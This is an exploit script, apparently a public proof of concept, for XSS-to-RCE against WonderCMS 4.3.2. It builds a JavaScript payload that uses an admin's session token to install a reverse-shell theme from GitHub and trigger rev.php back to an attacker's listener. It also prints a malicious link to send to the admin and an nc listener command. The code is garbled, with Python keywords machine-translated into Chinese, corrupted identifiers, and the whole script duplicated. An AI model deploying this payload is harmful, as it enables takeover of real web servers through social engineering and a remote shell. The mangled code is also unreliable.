#作者: ProfessionalMind
#exploit: Wondercms 4.3.2 XSS到RCE
导入系统
导入请求
导入操作系统
导入BS4
if(len(sys.argv)4): print('用法: python3
其他:
数据='''
var url=''''+str(sys.argv [1])+'''';
如果(url.endswith('/')){
url=url.slice(0,-1);
}
var urlwithoutlog=url.split('/')。切片(0,-1).join('/');
var urlWithOutLogBase=new URL(urlWithOutLog).pathName;
var token=document.queryselectorall('[name='token']')[0] .value;
var urlrev=urlwithoutlogbase +'/?installModule=3https://github.com/prodigiousmind/revshell/revshell/axtive/refs/heads/main.zipdirectoryname=vilettype=themesttype=themestoken=themestoken=' + soken;
var xhr3=new xmlhttprequest();
xhr3.withCredentials=true;
xhr3.open('get',urlrev);
xhr3.send();
xhr3.onload=function(){
如果(xhr3.status==200){
var xhr4=new xmlhttprequest();
xhr4.withCredentials=true;
xhr4.open('get',urlwithoutlogbase+'/themes/revshell-main/rev.php');
xhr4.send();
xhr4.onload=function(){
如果(xhr4.status==200){
var ip=''''+str(sys.argv [2])+'''';
var port=''''+str(sys.argv [3])+'''';
var Xhr5=new XMLHTTPRequest();
xhr5.withCredentials=true;
xhr5.open('get',urlwithoutlogbase +'/themes/revshell-main/rev.php?lhost=' + ip +'lport=' + port);
xhr5.send();
}
};
}
};
'''
TRY:
打开('xss.js','w')。写(数据)
print(创建'[+] XSS.JS')
print('[+]在另一个终端\ n \ n ------------------------------------------- \ nnc -lvp'+str(sys.argv [3])中执行以下命令))
打印('----------------------------------- \ n')
XSSlink=str(sys.argv [1])。替换('loginurl','index.php?page=loginurl?')+'\'/formscript+src=\'http://'+str(sys.argv [2])
xsslink=xsslink.strip('')
打印('将以下链接发送到Admin: \ n \ n ------------------------------------------ \ n'+XSSLink)
打印('----------------------------------- \ n')
打印('\ nstarting HTTP服务器允许访问XSS.JS')
OS.System('Python3 -m http.server \ n')
exceve:打印(数据,'\ n','//将其写入文件')
#exploit: Wondercms 4.3.2 XSS到RCE
导入系统
导入请求
导入操作系统
导入BS4
if(len(sys.argv)4): print('用法: python3
其他:
数据='''
var url=''''+str(sys.argv [1])+'''';
如果(url.endswith('/')){
url=url.slice(0,-1);
}
var urlwithoutlog=url.split('/')。切片(0,-1).join('/');
var urlWithOutLogBase=new URL(urlWithOutLog).pathName;
var token=document.queryselectorall('[name='token']')[0] .value;
var urlrev=urlwithoutlogbase +'/?installModule=3https://github.com/prodigiousmind/revshell/revshell/axtive/refs/heads/main.zipdirectoryname=vilettype=themesttype=themestoken=themestoken=' + soken;
var xhr3=new xmlhttprequest();
xhr3.withCredentials=true;
xhr3.open('get',urlrev);
xhr3.send();
xhr3.onload=function(){
如果(xhr3.status==200){
var xhr4=new xmlhttprequest();
xhr4.withCredentials=true;
xhr4.open('get',urlwithoutlogbase+'/themes/revshell-main/rev.php');
xhr4.send();
xhr4.onload=function(){
如果(xhr4.status==200){
var ip=''''+str(sys.argv [2])+'''';
var port=''''+str(sys.argv [3])+'''';
var Xhr5=new XMLHTTPRequest();
xhr5.withCredentials=true;
xhr5.open('get',urlwithoutlogbase +'/themes/revshell-main/rev.php?lhost=' + ip +'lport=' + port);
xhr5.send();
}
};
}
};
'''
TRY:
打开('xss.js','w')。写(数据)
print(创建'[+] XSS.JS')
print('[+]在另一个终端\ n \ n ------------------------------------------- \ nnc -lvp'+str(sys.argv [3])中执行以下命令))
打印('----------------------------------- \ n')
XSSlink=str(sys.argv [1])。替换('loginurl','index.php?page=loginurl?')+'\'/formscript+src=\'http://'+str(sys.argv [2])
xsslink=xsslink.strip('')
打印('将以下链接发送到Admin: \ n \ n ------------------------------------------ \ n'+XSSLink)
打印('----------------------------------- \ n')
打印('\ nstarting HTTP服务器允许访问XSS.JS')
OS.System('Python3 -m http.server \ n')
exceve:打印(数据,'\ n','//将其写入文件')